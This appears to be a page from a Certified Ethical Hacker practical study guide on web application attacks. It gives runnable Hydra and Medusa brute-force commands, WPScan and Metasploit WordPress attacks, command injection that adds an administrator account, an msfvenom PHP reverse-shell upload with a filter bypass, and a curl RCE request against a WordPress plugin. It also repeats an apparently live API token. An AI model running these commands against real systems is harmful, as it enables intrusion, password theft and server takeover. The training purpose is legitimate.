CEH Practical Guide
  • Certified Ethical Hacker (CEH v12 and CEH V13) Practical Guide: Complete Study Resources & Tips
  • Module 2. Footprinting and Reconnaissance
    • 1. Footprinting through Search Engines
    • 2. Perform Footprinting Through Internet Research Services
    • 3. Footprinting through Social Networking sites
    • 4. Website Footprinting
    • 5. WHOIS Footprinting
    • 6. DNS Footprinting
    • 7. Network footprinting
    • 8. Email Footprinting
    • 9. Footprinting using footprinting tools
    • 10. Perform Footprinting using AI
  • Module 3. Scanning Networks
    • 1. Host Discovery
    • 2. Port and Service Discovery
    • 3. Perform OS Discovery
    • 4. Scan beyond Firewalls and IDS
    • 5. Network scanning using various tools
    • 6. Perform Network Scanning using AI
  • Module 4. Enumeration
    • 1. Netbios Enumeration (Port 137)
    • 2. SNMP Enumeration (Port 161,162)
    • 3. LDAP Enumeration (Port 389)
    • 4. NFS Enumeration
    • 5. DNS Enumeration
    • 6. SMTP Enumeration
    • 7. RPC, SMB and FTP Enumeration
    • 8. Enumeration using various tools
    • 9. Perform Enumeration using AI
  • Module 5. Vulnerability Assessment
    • 1. Perform Vulnerability Research with Vulnerability Scoring Systems and Databases
    • 2. Perform Vulnerability Assessment using Various Vulnerability Assessment Tools
    • 3. Perform Vulnerability Analysis using AI
  • Module 6. System Hacking
    • 1. Gain access to the system
    • 2. Privilege Escalation
    • 3. Maintain Remote Access and Hide Malicious Activities
    • 4. Clear Logs to hide the Evidence of Compromise
    • 5. Active Directory (AD) Attacks
  • Module 7. Malware Threats
    • 1. Gain access to systems with Trojans
    • 2. Infect the system using Virus
    • 3. Perform Static Malware Analysis
    • 4. Perform Dynamic Malware Analysis
  • Module 8. Sniffing
    • 1. Perform Active Sniffing
    • 2. Perform Network Sniffing using Various Sniffing Tools
    • 3. Detect Network Sniffing
  • Module 9. Social Engineering
    • 1. Perform Social Engineering using tools
    • 2. Detect a Phishing attack
    • 3. Audit Organization security for phishing attacks
    • 4. Social Engineering using AI
  • Module 10. Denial of Service
    • 1. Perform DOS and DDOS with various techniques
    • 2. Detect and Protect DOS and DDOS attacks
  • Module 11. Session Hijacking
    • 1. Perform Session Hijacking
    • 2. Detect Session Hijacking
  • Module 12. Evading IDS, antivirus and Honeypots
    • 1. Intrusion Detection using various tools
    • 2. Evade Firewall using Evasion Techniques
  • Module 13. Hacking Web Servers
    • 1. Footprint the Webserver
    • 2. Perform Webserver attacks
    • 3. Perform a Web Server Hacking using AI
  • Module 14. Hacking Web Applications
    • 1. Footprint the Web Infrastructure
    • 2. Perform Web applications Attacks
    • 3. Detect Web Vulnerabilities using using web application security tools
    • 4. Perform Web Application Hacking using AI
  • Module 15. SQL Injection
    • 1. Perform SQL Injection attacks
    • 2. Detect SQL Vulnerabilities using different tool
    • 3. Perform SQL Injection using AI
  • Module 16. Hacking Wireless Networks
    • 1. Footprint a wireless Network
    • 2. Perform Wireless Traffic Analysis
    • 3. Perform Wireless Attacks
  • Module 17. Hacking Mobile Platforms
    • 1. Hack Android Devices
    • 2. Secure Android Device
  • Module 18. IoT and OT Hacking
    • 1. Footprinting IoT and OT devices
    • 2. Capture and Analyze IoT traffic
    • 3. Perform IoT Attacks
  • Module 19. Cloud Computing
    • 1. Perform Reconnaissance on Azure
    • 2. S3 Bucket Enumeration
    • 3. Exploit S3 buckets
    • 4. Perform Privilege Escalation to Gain Higher Privileges
    • 5. Perform Vulnerability Assessment on Docker Images
  • Module 20. Cryptography
    • 1. Encrypt the Information using Various Cryptography Tools
    • 2. Create a self signed Certificate
    • 3. Perform Disk Encryption
    • 4. Cryptanalysis Using different tools
    • 5. Perform Cryptography using AI
  • Tips for exams
  • Additional Resources
Powered by GitBook
On this page
  • 1. Brute force using Burp
  • Hydra Brute force cheatsheat
  • 2. Parameter tampering using Burp
  • 3. Identify XSS using PwnXss
  • 4. Exploit Parameter tempering with XSS
  • 5. Perform CSRF attacks
  • 6. Hack a wordpress site with WPSCAN and Metasploit
  • Installation
  • WPSCAN brute forcing
  • Reference
  • 7. Remote command execution to compromise a target server
  • Windows Command Injection
  • 8. Exploit File upload vulnerability
  • 9. Exploit Log4j vulnerability
  • 10. Perform Remote Code Execution (RCE) Attack

Was this helpful?

  1. Module 14. Hacking Web Applications

2. Perform Web applications Attacks

An ethical hacker or pen tester must test their company’s web application against various attacks and other vulnerabilities.

Previous1. Footprint the Web InfrastructureNext3. Detect Web Vulnerabilities using using web application security tools

Last updated 6 months ago

Was this helpful?

1. Brute force using Burp

set the burp proxy in browser, intercept the request, right click it and send it to intruder.

Now clear the fields and set the targets

  • sniper if you are only brute forcing password.

  • cluster if bruteforcing both username and password

set the payload, wordlists and launch attack. Different values of length will indicate the successful attempt.

Other Bruteforcing tools

medusa -h 10.10.10.x -U /root/Documents/user_list.txt -p /root/Documents/pass_list.txt -M ftp -F

Hydra Brute force cheatsheat

# SSH
hydra -l username -P passlist.txt 192.168.0.100 ssh
  
 # FTP
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100
 
# If the service isn't running on the default port, use -s
 hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100 -s 221
  
# TELNET
hydra -l admin -P passlist.txt -o test.txt 192.168.0.7 telnet

# Login form
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"  
  

2. Parameter tampering using Burp

In the proxy tab, go to the inspector session where value and name will be visible. You can change it and see the response.

3. Identify XSS using PwnXss

python3 pwnxss.py -u http://testphp.vulnweb.com

4. Exploit Parameter tempering with XSS

5. Perform CSRF attacks

WPSCAN

wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://www.cavementech.com/ --plugins-detection aggressive --enumerate vp

Add --random-user-agent to avoid firewalls

6. Hack a wordpress site with WPSCAN and Metasploit

Installation

sudo apt update && sudo apt install wpscan 
wpscan --update

Enumerate wordpress users

wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://cavementech.com/ --enumerate u 

WPSCAN can be used to enumerate users, themes, plugins etc

wpscan --url http://cmnatics.playground/ --enumerate u,p,t,vp --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY

Now launch the Metasploit with database

service postgresql start
msconsole
use auxillary/scanner/wordpress_login_enum

Now set the options to brute force it

set  PASS_FILE /usr/worlist.txt
set RHOSS 192.168.52.2
set RPORT 8080
set TARGETURI http://dddddd/login
set USERNAME admin
run

WPSCAN brute forcing

wpscan –-url http://cmnatics.playground –-passwords rockyou.txt –-usernames cmnatic --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY

Reference

7. Remote command execution to compromise a target server

Setup and complete DVWA Guides

Windows Command Injection

hostname
whoami
tasklist
Taskkill /PID 3112 /F   //forcefully kills the processes
dir c:\
net user
net user test /add     //add a new user
net localgroup Administrators test /add    //add test user to administrators
net user test     //to view the details of the user
dir c:\ "pin.txt" or this command ! Take pin.txt
| type c:\"pin.txt"

8. Exploit File upload vulnerability

Generating the payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw >exploit.php

Run multi/handler to catch the shell

use exploit/multi/handler 
set payload php/meterpreter/reverse_tcp

Check the above DVWA walkthroughs. For high mode add the following on top of payload and save it as jpeg

GIF98a;

Now in command prompt, rename the file

copy C:\wamp64\www\DVWA\hackable\uploads\shell.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php 

open the shell, and you will get the meterpreter session.

9. Exploit Log4j vulnerability

10. Perform Remote Code Execution (RCE) Attack

We will exploit RCE in a plugin in wordpress.

  1. In the Terminal window, run wpscan --url http://10.10.1.22:8080/CEH --api-token [API Token] command.

  2. The result appears, displaying detailed information regarding the target website.

  3. Scroll down to the Plugin(s) Identified section, and observe the installed vulnerable plugins (wp-upg) on the target website.

  4. In the Plugin(s) Identified section, within the context of the wp-upg plugin, an Unauthenticated Remote Code Execution (RCE) vulnerability has been detected as shown in the screenshot.

    The number of vulnerable plugins might differ when you perform this lab.

  5. In this task, we will exploit the RCE vulnerability present in the wp-upg plugin.

  6. To perform RCE attack, run curl -i 'http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL' command.

  7. This curl command exploits a WordPress plugin vulnerability by sending a malicious request to the admin-ajax.php file, allowing an attacker to execute arbitrary system commands via the exec function, potentially leading to remote code execution.

  8. In the last step, whoami command was executed, yielding the outcome nt authority\ \system

Brute Force Password Cracking with MedusaMedium
Medusa
GitHub - pwn0sec/PwnXSS: PwnXSS: Vulnerability (XSS) scanner exploitGitHub
TryHackMe | Cyber Security TrainingTryHackMe
DVWA Walkthrough Step by Step - CavemenTech - Demystifying TechnologyCavemenTech - Demystifying Technology
DVWA Ultimate Guide - First Steps and Walkthrough - Bug HackingBug Hacking
Certified Ethical Hacker (CEHv12) Practical hands on LabsUdemy
Logo
Logo
Logo
Logo
Logo
Logo